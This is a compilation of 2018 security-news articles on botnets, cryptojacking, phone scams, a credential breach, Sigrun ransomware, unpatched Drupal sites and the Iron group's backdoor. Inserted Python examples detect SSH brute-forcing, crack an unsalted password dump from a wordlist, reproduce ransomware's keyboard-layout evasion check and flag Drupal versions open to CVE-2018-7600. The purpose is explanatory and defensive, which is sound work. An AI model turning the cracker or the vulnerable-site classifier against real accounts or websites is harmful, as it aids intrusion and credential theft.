Check Point published its latest Global Threat Index for May 2018, revealing that the Coinhive cryptominer impacted 22% of organizations globally – up from 16% in April, an increase of nearly 50%. May 2018 marked the fifth consecutive month where cryptomining malware dominated Check Point’s Top Ten Most Wanted Malware Index. Coinhive retained the top spot as the most prevalent malware with Cryptoloot – another crypto-mining malware – ranked second with a global reach of … More

The post Cryptomining malware digs into nearly 40% of organizations worldwide appeared first on Help Net Security.

Traffic manipulation and cryptocurrency mining campaign compromised 40,000+ machines

Unknown attackers have compromised 40,000+ servers, networking and IoT devices around the world and are using them to mine Monero and redirect traffic to websites hosting tech support scams, malicious browser extensions, and so on. The campaign, dubbed Operation Prowli by the Guardicore Labs team, spreads malware and malicious code to servers, websites and devices after compromising them via exploits, password brute-forcing and by taking advantage of weak configurations. Operation Prowli Two specific things grabbed … More

The post Traffic manipulation and cryptocurrency mining campaign compromised 40,000+ machines appeared first on Help Net Security.

Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices

Crooks have infected over 40,000 web servers, modems, and other IoT devices with the Prowli malware as part of a cryptocurrency mining campaign and to redirect victims to malicious sites.

The Prowli malware was spotted by researchers at GuardiCore, attackers composed the huge botnet by exploiting known vulnerabilities and brute-force attacks.

This campaign, dubbed Operation Prowli, targeted servers and devices using the following attack methods:

  • Using a self-propagating worm that targets systems running SSH by brute-force credential guessing; the infected machines then download and run a cryptocurrency miner.
  • Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! servers running the K2 extension.
  • Accessing the internet-facing configuration panel of a variety of DSL modems by using a URL such as http://:7547/UD/act?1 and passing in parameters exploiting a known vulnerability. The vulnerability affects the processing of SOAP data and allows remote code execution. This vulnerability was previously used by the Mirai worm.
  • Using several exploits and launching brute-force attacks on the admin panel of WordPress sites.
  • Exploiting a 4-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on servers running HP Data Protector exposed to the internet (over port 5555).
  • Targeting Drupal and PhpMyAdmin installations, NFS boxes, and servers with exposed SMB ports via brute-force credential guessing.


Once attackers have compromised a server or an IoT device, they determine if they can use it for cryptocurrency mining operations. Hackers used a Monero miner and the r2r2 worm, a piece of malware used to launch SSH brute-force attacks from the hacked devices.
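The SSH brute-force behaviour of the r2r2 worm is easy to spot in sshd logs. The Python below, an added example that is not GuardiCore's code, flags source IPs with a burst of failed password logins inside a short window and reports whether a login from that IP succeeded afterwards (a likely compromised account); the auth.log lines are constructed.

```python
"""Brute-force login detection over OpenSSH auth.log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Standard sshd syslog layout; the year is absent, so it is assumed below.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$")
ASSUMED_YEAR = 2018  # assumption: year of the Prowli campaign

Event = Tuple[datetime, str, str, str]  # (time, result, user, source ip)


def parse(line: str) -> Optional[Event]:
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines: List[str], threshold: int = 10,
                      window_s: int = 60) -> Dict[str, dict]:
    """Return {ip: {"failures", "users", "success_after"}} for every source IP
    with at least `threshold` failed logins inside any `window_s` window.
    success_after is the user name of the first accepted login from that IP
    at or after the burst, else None."""
    per_ip: Dict[str, List[Event]] = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev:
            per_ip[ev[3]].append(ev)
    alerts: Dict[str, dict] = {}
    for ip, evs in per_ip.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        burst_end = None
        j = 0  # sliding window over failure timestamps
        for i in range(len(fails)):
            while (fails[i][0] - fails[j][0]).total_seconds() > window_s:
                j += 1
            if i - j + 1 >= threshold:
                burst_end = fails[i][0]
                break
        if burst_end is None:
            continue
        success = next((e[2] for e in evs
                        if e[1] == "Accepted" and e[0] >= burst_end), None)
        alerts[ip] = {"failures": len(fails),
                      "users": sorted({e[2] for e in fails}),
                      "success_after": success}
    return alerts


# Constructed sample log: one worm-like source, one ordinary user typo.
SAMPLE_AUTH_LOG = [
    f"Jun  7 10:00:{s:02d} host1 sshd[{1000 + s}]: Failed password for {u} "
    f"from 203.0.113.7 port {40000 + s} ssh2"
    for s, u in enumerate(["root", "admin", "root", "pi", "admin", "root",
                           "test", "root", "pi", "admin", "root", "pi"])
] + [
    "Jun  7 10:00:15 host1 sshd[1020]: Accepted password for pi from 203.0.113.7 port 40020 ssh2",
    "Jun  7 10:03:02 host1 sshd[1101]: Failed password for invalid user oracle from 198.51.100.4 port 51000 ssh2",
    "Jun  7 10:03:40 host1 sshd[1102]: Accepted password for alice from 198.51.100.4 port 51001 ssh2",
]

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures against {info['users']}, "
              f"success afterwards: {info['success_after']}")
```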

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also compromised servers with the WSO web shell backdoor. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS); with this kind of scheme, crooks monetize their efforts by selling hijacked traffic.


Further details on the Prowli campaign, including IoCs, are reported in the analysis published by GuardiCore.

Pierluigi Paganini

(Security Affairs – Prowli, hacking)

The post Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices appeared first on Security Affairs.


PSA: Users with landlines are more vulnerable to scams

It’s time to have “the talk” with your parents, relatives, and loved ones. Anyone still using a landline must be warned: having a home phone makes you particularly vulnerable to scams.

We know here at Malwarebytes that our readers are often the unofficial “IT” department for their families, relatives, and friends. While suggesting to your folks that they discontinue having a landline might not go over well, we still need them to at least be wary of that telephone and the types of calls they might receive on it.

What was once an essential communication tool is now a gateway into your home—a scam delivery mechanism.

Looking at all the inbound calls that my relatives with landlines were receiving left me with a sneaking suspicion that they must have landed on a “victim list” of sorts. Types of scam calls included:

  • Tech support scams (as many as several times a day)
  • Robocalls
  • Charity requests (some more dubious than others)
  • Political calls
  • Surveys
  • IRS/Bank/FBI/Police scams (more tax scams during tax season)

While they do not wish to part with their landlines, I have investigated some other possible solutions for my relatives to avoid scams.

I found some call blocker hardware. However, reviews indicated that this wasn’t particularly effective against scammers. For example, this solution wouldn’t stop tech support scammers that spoof residential numbers.

I also found another device that requires callers to enter a password before it allows the phone to ring for any inbound call.

Neither of these felt like an acceptable solution.

Ultimately, knowledge is power, so I’m choosing to explain all the scams that they encountered. In addition, I’d like to point out our tech support scam resource page.

Microsoft tech support

The standard, tried-and-true tech support scam. These are either initiated from a cold call, “Hi, I’m from Microsoft!”, or by driving potential victims to call “Microsoft tech support” themselves after being served a malicious pop-up or browser locker, with the specific intent of tricking users into thinking their computer is infected and they need to pay tech support to fix it.

This scam has many variants. The scammers will claim to be the official support for any number of security products. They will try to impersonate Microsoft or other antivirus companies. They have even tried to impersonate Malwarebytes.

There’s a simple fix for this scam. If you get a call from “Microsoft,” hang up immediately. They will never call you. There is no “Internet Tech Support,” and your connection is not monitored for emanating threats.

Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.

Unfortunately, most scammers have now switched to pop-ups that drive the victims to initiate the call. Even worse, browlocks, or browser lockers, which effectively prevent further use of the computer, are on the rise.

Banks, FBI, police, and the IRS

Scammers will impersonate institutions of authority.

These types of institutions almost never call. If they do, simply ask for their name and their department, and inform them you will call them right back. If they politely say they understand and give you their information, there is a good chance this is a legitimate call. (Keep in mind that it is extraordinarily rare for the FBI, banks, IRS, or police to initiate a call.)

Use the Internet to double-check the number to call back. The scammers may try to be helpful and provide you with theirs, but a quick Google search of their phone number can tell you where they’re calling from (and if that matches with where their company headquarters is located).

If the person on the other end of the line gets angry or starts threatening you, guess what? They’re a scammer. Remember, they’re trying to instill in you a sense of urgency in order to override your common sense.

Stranded grandchildren

An especially heinous scam, this variant targets grandparents using classic psychological manipulation. The scenario is that their grandchild is calling from jail, arrested for disorderly conduct, and this is their one phone call. Sense of urgency? Check. Fear for a loved one? Check. Common sense thrown out the window? Check.

This scam usually tries to get Grandma to send money “for bail” via MoneyGram or Western Union.

So what happens if you get a call from someone claiming to be your grandchild stuck in jail? Well, much of this scam relies on grandparents being less in-the-know about their grandkids. Do they know what her voice sounds like? Her phone number? Would she never be arrested for disorderly conduct?

If you don’t know for sure, verify with other family members. Text the child’s parents while on the landline with her. Confirm that the family member is who she claims to be by asking personal questions only the relative would know. Scammers will try to fudge through details. Some might start crying. Again, the sense of urgency is pivotal in this scam.

Remember this: If your grandchild were truly in trouble and in jail, would you be the one person she would call? If that’s true, then you’d know if it were her on the other end of the line within seconds. If you’re not her go-to person, then it’s fair to ask more questions and to check in with other family members about the legitimacy of the call. You can even hang up and call back your grandchild on her cell. Chances are, she’ll pick up and have no idea who called you just now.

Caller ID is bunk

Nowadays, you can’t just trust that your caller ID will flag suspicious numbers. The responsibility of caller ID lies with the originating call. And if that caller is a scammer, then they know caller ID is trivial to spoof. Scammers have long since figured out how to spoof numbers so that it appears they’re coming from a familiar, local area code, as it greatly increases their chances at a successful scam. Both the Microsoft tech support call and the fake IRS calls use spoofed caller ID.

I demonstrated how easy spoofing was by using an app on my phone and making a call that appeared to originate from somewhere else. For a technical explanation of how caller ID spoofing works, check out this YouTube video.

TLDR

  • Never allow anyone remote access to your computer.
  • Is there a pitch for a product/service/subscription? It’s probably a scam.
  • Is there a sense of urgency? IRS + “you will go to jail!” = scam!
  • Caller ID is bunk. Don’t trust it.
  • No legitimate institutions will want Apple iTunes cards or any other gift card as a payment form.

When it comes to using a land line, I don’t think there’s an ideal solution—one that guarantees 100 percent safety. However, armed with the right amount of knowledge, users can easily fend off scams—and stop being afraid of their phone.

Do you know someone who still has a landline? Have you had to explain scams to your relatives? Ever encounter any different scams than the one mentioned by phone? Please don’t hesitate to share your stories with us in the comments.

The post PSA: Users with landlines are more vulnerable to scams appeared first on Malwarebytes Labs.

Sophisticated keyloggers target the finance industry

Lastline found three separate strains of keylogger malware that are currently targeting finance. Lastline’s analysis of the 100 most recent malware samples found among finance firms uncovered an unusually large number of iSpy keylogger samples, which is a variant of the notorious HawkEye logger, a fully functioning keylogger that sends victim’s credentials to a server under the keylogger operator’s control. By intercepting the communication with the command and control server, Lastline detected the active exfiltration … More

The post Sophisticated keyloggers target the finance industry appeared first on Help Net Security.

It’s not a joke, Owari botnet operators used root as username and password to access a C&C

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.

An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet controlled through a poorly configured infrastructure: the botmaster used weak credentials for authentication to the command-and-control server.

The researchers exploited the weak configuration to take over the MySQL server used to control the Owari botnet; the author left port 3306 open, allowing authentication with “root” as both username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root

The situation is paradoxical considering that Mirai-based botnets, including Owari,  spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

The database investigation allowed the expert to discover a User table that contains login credentials for the various users who control the botnet. Some entries could be associated with botmasters or with customers of the botnet.

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also looked into the revenue model behind the Owari botnet and reached a known Owari operator who goes by “Scarface”, who provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course not. Even though the expert took over the MySQL database, botnet operators continuously change their attack IPs to stay under the radar once malicious traffic from some of them is detected.

The IPs reported in the expert’s analysis are already offline.

Pierluigi Paganini

(Security Affairs – Owari botnet, cybercrime)

The post It’s not a joke, Owari botnet operators used root as username and password to access a C&C appeared first on Security Affairs.

MyHeritage data breach – 92.3 million user credential exposed

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million MyHeritage users stored on a private server outside the company.

The huge trove of data was contained in a file named “myheritage”; according to the experts, the information is authentic and comes from MyHeritage.

“Today, June 4, 2018 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a genealogy service for researching family history and building family trees, including through DNA analysis.

The researcher reported the discovery to the company on June 4, 2018; the incident affects users who signed up for the service on or before October 26, 2017.

Only email addresses and hashed passwords were in the file; no other data was found on the server hosting it.

The company pointed out that passwords were not stored in plain text but did not say which hashing scheme protects them.
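The hashing scheme matters more than the fact of hashing, so here is an added example (not MyHeritage’s code; their scheme is not disclosed on this page) of why: a constructed dump of unsalted SHA-1 hashes falls to a small wordlist in a single pass over the wordlist, while the same passwords stored with a per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256 here) have to be attacked one account at a time. Email addresses, passwords and the iteration count are made up for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist and accounts (not real data).
WORDLIST = ["password", "123456", "letmein", "qwerty", "genealogy"]


def sha1_hex(pw):
    return hashlib.sha1(pw.encode()).hexdigest()


# The weak scheme: one fast, unsalted hash per password. A leaked dump of these
# lets an attacker hash the wordlist once and look every user up in the result.
UNSALTED_DUMP = {
    "alice@example.com": sha1_hex("genealogy"),
    "bob@example.com": sha1_hex("letmein"),
    "carol@example.com": sha1_hex("c0rrect-horse-battery"),
}


def crack_unsalted(dump, wordlist):
    """Recover every account whose password is in the wordlist with one precomputed
    table: cost is O(len(wordlist)) regardless of how many users leaked."""
    table = {sha1_hex(w): w for w in wordlist}
    return {email: table[h] for email, h in dump.items() if h in table}


# The stronger scheme: per-user random salt plus an iterated KDF.
PBKDF2_ITER = 200_000  # assumed value for the example; tune to your hardware


def hash_password(pw, salt=None):
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ITER)
    return f"pbkdf2_sha256${PBKDF2_ITER}${salt.hex()}${dk.hex()}"


def verify_password(pw, stored):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_salted(dump, wordlist):
    """Same wordlist against salted records: no shared table is possible, so the
    attacker pays the full KDF cost for every (account, candidate) pair."""
    found = {}
    for email, stored in dump.items():
        for w in wordlist:
            if verify_password(w, stored):
                found[email] = w
                break
    return found


def kdf_evaluations(n_accounts, wordlist):
    """Work a wordlist attack costs: one hash per word for an unsalted dump,
    one KDF run per (account, word) pair for a salted one."""
    return {"unsalted": len(wordlist), "salted": n_accounts * len(wordlist)}


if __name__ == "__main__":
    print("unsalted dump cracked:", crack_unsalted(UNSALTED_DUMP, WORDLIST))
    salted = {e: hash_password(p) for e, p in
              [("alice@example.com", "genealogy"), ("bob@example.com", "letmein")]}
    print("salted dump cracked:", crack_salted(salted, WORDLIST))
    print("work for 92.3M accounts:", kdf_evaluations(92_300_000, WORDLIST))
```

Both schemes give up the weak passwords; the difference is that for 92.3 million salted, iterated records the attacker’s work scales with the number of accounts rather than with the size of the wordlist, which is the only thing standing between a leaked dump and mass credential stuffing.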

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time of the notification, the company had not observed any abuse of the compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the breach and is going to hire a cybersecurity firm to conduct a comprehensive forensic investigation.

The company announced it is planning to introduce a two-factor authentication feature to give its users further protection.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”

Pierluigi Paganini

(Security Affairs – privacy, data breach)

The post MyHeritage data breach – 92.3 million user credential exposed appeared first on Security Affairs.

The author of the Sigrun Ransomware decrypts Russian victims’ files for free

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free; everyone else has to pay a ransom of $2,500 worth of Bitcoin or Dash.

We have reported several cases in which Russian malware authors avoid infecting computers in their own country; the case discussed here adds a further twist.

The case was first spotted by the malware researcher Alex Svirid, and other experts confirmed his discovery.

Sigrun also avoids infecting Russian victims by checking the keyboard layout, a common trick Russian malware authors use to avoid drawing the attention of local law enforcement.

When executed, Sigrun first checks “HKEY_CURRENT_USER\Keyboard Layout\Preload” to determine whether a Russian layout is installed. If it is, the malware does not encrypt any files and deletes itself.

Experts pointed out that the ransomware still hits users in the former USSR republics, many of whom do not use the Russian keyboard layout for political reasons. That is why the Sigrun author decided to hand the decryption key to those victims for free.
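An added example (not the ransomware’s code) of the check described above, written the way a defender reproducing the behaviour would: the values under HKCU\Keyboard Layout\Preload are keyboard layout identifiers (KLIDs) whose low 16 bits are a Windows language ID, 0x0419 for Russian and 0x0422 for Ukrainian. The function reads the key via winreg on Windows and otherwise takes a constructed list, and reports whether a family with Sigrun’s original exclusion list, or the later one its author describes, would skip the machine. The Preload sets are constructed, not read from real systems.

```python
import sys

# Windows primary language IDs (low 16 bits of a KLID). Russian is what the page
# says Sigrun checks; Ukrainian is what its author says was added afterwards.
LANGID_RUSSIAN = 0x0419
LANGID_UKRAINIAN = 0x0422
SIGRUN_EXCLUDED = {LANGID_RUSSIAN}
SIGRUN_EXCLUDED_UPDATED = {LANGID_RUSSIAN, LANGID_UKRAINIAN}


def langids_from_preload(preload_values):
    """Map Preload values (8-hex-digit KLID strings such as '00000409') to language IDs.
    Malformed values are ignored rather than guessed at."""
    ids = set()
    for v in preload_values:
        v = v.strip()
        if len(v) == 8 and all(c in "0123456789abcdefABCDEF" for c in v):
            ids.add(int(v, 16) & 0xFFFF)
    return ids


def would_skip_machine(preload_values, excluded=SIGRUN_EXCLUDED):
    """True if any preloaded layout's language is on the malware's exclusion list."""
    return bool(langids_from_preload(preload_values) & excluded)


def read_preload_windows():
    """Read HKCU\\Keyboard Layout\\Preload on Windows; return None elsewhere."""
    if sys.platform != "win32":
        return None
    import winreg
    values = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Keyboard Layout\Preload") as key:
        i = 0
        while True:
            try:
                _name, data, _type = winreg.EnumValue(key, i)
            except OSError:
                break
            values.append(str(data))
            i += 1
    return values


# Constructed Preload sets for three machines.
US_ONLY = ["00000409"]
US_PLUS_RUSSIAN = ["00000409", "00000419"]
US_PLUS_UKRAINIAN = ["00000409", "00000422"]

if __name__ == "__main__":
    machines = [("us", US_ONLY), ("us+ru", US_PLUS_RUSSIAN),
                ("us+uk", US_PLUS_UKRAINIAN), ("this host", read_preload_windows())]
    for name, vals in machines:
        if vals is None:
            continue
        print(f"{name:9} original rule skips: {would_skip_machine(vals)!s:5} "
              f"updated rule skips: {would_skip_machine(vals, SIGRUN_EXCLUDED_UPDATED)}")
```

The `us+uk` row is the case the article describes: a Ukrainian-layout machine passes the original Russian-only check and gets encrypted, which is what pushed the author to add the second language ID.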

“Ukrainian users don’t use Russian layout because of political reasons. So we decided to help them if they were infected,” the Sigrun author told BleepingComputer via email.

“We have already added avoiding Ukrainian layout like was in Sage ransomware before.” They also told us that the email images above are not from Sigrun but another ransomware.

Lawrence Abrams of BleepingComputer spoke with the malware author, who said they are not from the former USSR republics.

“Finally, the Sigrun developer told us that they are “not from former USSR republics. I added it because of my Belarus partners.” added Abrams.

Once running, Sigrun scans the computer for files to encrypt and appends the .sigrun extension to each encrypted file’s name. It drops two ransom notes, RESTORE-SIGRUN.txt and RESTORE-SIGRUN.html, in every folder containing encrypted files.

It skips files with certain extensions or filenames, and files located in particular folders.

The ransom notes include information on the infection and payment instructions.

“At this time, the Sigrun Ransomware cannot be decrypted for free unless you are a Russian victim and the author helps you,” concluded Lawrence.

Further technical details, including IoCs, are reported in the analysis shared by BleepingComputer.

Pierluigi Paganini

(Security Affairs – cybercrime, Sigrun Ransomware)

The post The author of the Sigrun Ransomware decrypts Russian victims’ files for free appeared first on Security Affairs.

Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks

Two months after the release of the security updates for the Drupalgeddon2 flaw, experts continue to find websites running unpatched, vulnerable versions of Drupal.

In March, Drupal developer Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600 and dubbed Drupalgeddon2, affecting Drupal 7 and 8.

Drupal 8.3.x and 8.4.x are no longer supported, but given the severity of the flaw the Drupal Security Team decided to address it in those branches too, with dedicated security updates issued a few days later.

The vulnerability allows an attacker to run arbitrary code in the CMS core and take over a website simply by accessing a crafted URL.

After a working proof-of-concept for Drupalgeddon2 was published on GitHub, experts started observing attackers using it to deliver backdoors and cryptocurrency miners.

According to security researcher Troy Mursch, over 115,000 Drupal sites have still not installed the security patches for the Drupalgeddon2 vulnerability.

Mursch scanned the Internet for websites running Drupal 7.x and found nearly 500,000; 115,070 of them were running outdated versions vulnerable to Drupalgeddon2. The scan did not cover 6.x and 8.x sites.

“How many Drupal sites are vulnerable? To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.”
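The page does not say how Mursch determined each site’s version, so this added example (not his scanner) shows the simplest version-based classification a practitioner would run over observations they have already collected: the first line of a site’s /CHANGELOG.txt or its X-Generator header is parsed into a version tuple and compared against the fixed releases from Drupal’s advisory for CVE-2018-7600 (7.58, 8.3.9, 8.4.6 and 8.5.1). The hostnames and version strings are constructed; a “Drupal 7” generator header with no minor version correctly lands in the “could not ascertain” bucket, as in Mursch’s third figure.

```python
import re

# Fixed versions from the Drupal advisory for CVE-2018-7600 (SA-CORE-2018-002).
# 8.3 and 8.4 are the out-of-support branches the page says were patched anyway.
FIXED = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}

# Version strings commonly leak in the first line of /CHANGELOG.txt
# ("Drupal 7.57, 2018-02-21") or in the X-Generator header ("Drupal 7 (https://www.drupal.org)").
CHANGELOG_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?", re.M)
GENERATOR_RE = re.compile(r"Drupal (\d+)(?:\.(\d+))?(?:\.(\d+))?")


def parse_version(text):
    """Return a version tuple from a CHANGELOG line or X-Generator value, or None."""
    for rx in (CHANGELOG_RE, GENERATOR_RE):
        m = rx.search(text)
        if m:
            return tuple(int(p) for p in m.groups() if p is not None)
    return None


def classify(version):
    """'vulnerable', 'patched' or 'unknown' for CVE-2018-7600, by version alone."""
    if version is None:
        return "unknown"
    if version[0] == 7:
        if len(version) < 2:
            return "unknown"  # header says only "Drupal 7": version not ascertainable
        return "patched" if version >= FIXED[(7,)] else "vulnerable"
    if version[0] == 8:
        if len(version) < 3:
            return "unknown"
        branch = version[:2]
        if branch not in FIXED:
            # 8.0 to 8.2 never received a fix; branches after 8.5 shipped with it.
            return "vulnerable" if branch < (8, 3) else "patched"
        return "patched" if version >= FIXED[branch] else "vulnerable"
    return "unknown"  # Drupal 6 was outside the scan's scope


def classify_sites(observations):
    """observations: {site: observed text}. Returns per-site class and totals."""
    results = {site: classify(parse_version(txt)) for site, txt in observations.items()}
    totals = {c: sum(1 for v in results.values() if v == c)
              for c in ("vulnerable", "patched", "unknown")}
    return results, totals


# Constructed observations (hostnames and version strings are made up).
SAMPLE = {
    "a.example": "Drupal 7.57, 2018-02-21\n-----------------------",
    "b.example": "Drupal 7.59, 2018-04-25",
    "c.example": "Drupal 7 (https://www.drupal.org)",
    "d.example": "Drupal 8.4.5, 2018-02-21",
    "e.example": "Drupal 8.5.3, 2018-04-25",
    "f.example": "<html>nothing useful</html>",
}

if __name__ == "__main__":
    results, totals = classify_sites(SAMPLE)
    for site, verdict in results.items():
        print(f"{site:12} {verdict}")
    print(totals)
```

A version check only says whether the hole is still open; it says nothing about whether a site that was exploited before patching was ever cleaned, which is the point the article makes about backdoors and miners having already been dropped through it.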

The researcher found numerous vulnerable sites in the Alexa Top 1 Million; the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns against Drupal sites are continuing even after his first report:

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency-mining campaign; the document now includes data on several different campaigns he discovered.

Mursch published IoCs for the campaign. The presence online of 115,000 vulnerable Drupal 7.x websites is very dangerous: a gift for crooks, who can abuse them for a broad range of illegal activities.

Pierluigi Paganini

(Security Affairs – Drupal, Drupalgeddon2)

The post Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks appeared first on Security Affairs.

Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw

Security experts at Intezer have discovered a backdoor, attributed to the Iron cybercrime group, that is built on the leaked source code of HackingTeam’s Remote Control System (RCS).

RCS is the surveillance software developed by HackingTeam; it was regarded as a powerful implant that could also infect mobile devices for covert surveillance. RCS can intercept encrypted communications, including email and VoIP calls (e.g. Skype), and its mobile version, available for the major platforms of the time (Apple, Android, Symbian and BlackBerry), can fully control the handset and its components, including the camera, the microphone and the GPS module.

The Iron cybercrime group has been active since at least 2016 and is best known for the Iron ransomware, but over the years it has built various strains of malware, including backdoors, cryptocurrency miners and ransomware, targeting both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor uses an installer protected with VMProtect and packed with UPX; the malicious code can detect whether it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor DLL to %localappdata%\Temp\<random>.dat, and then checks the OS version to decide which backdoor build to launch.

The malware halts if it detects Qihoo 360 products. It also installs a malicious root CA certificate used to sign the backdoor binary, then creates a service pointing back to the backdoor.

The analysis showed that two components shared by the group’s IronStealer and Iron ransomware families were lifted from HackingTeam’s leaked code: the VM detection code from the “Soldier” implant and the DynamicCall module from the “core” library.

The malware uses a patched version of the popular Adblock Plus Chrome extension to inject both an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment-hijacking module.

The extension runs constantly in the background as a stealthy host-based crypto-miner. Every minute the malware checks whether Chrome is running and silently launches it if it is not.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also bundles an Adblock Plus build for Internet Explorer capable of injecting remote JavaScript, though this functionality is no longer used automatically.

The malware decrypts hard-coded shellcode that loads a Cobalt Strike beacon in memory and fetches a payload URL from a hard-coded Pastebin address.

The malicious code can drop two further payloads: a variant of the “JbossMiner Mining Worm” tracked as Xagent, and the Iron ransomware.

The group uses the malware to steal cryptocurrency from the victim’s workstation: the Iron backdoor drops the latest voidtools Everything search utility, silently installs it and uses it to find files likely to contain cryptocurrency wallets.

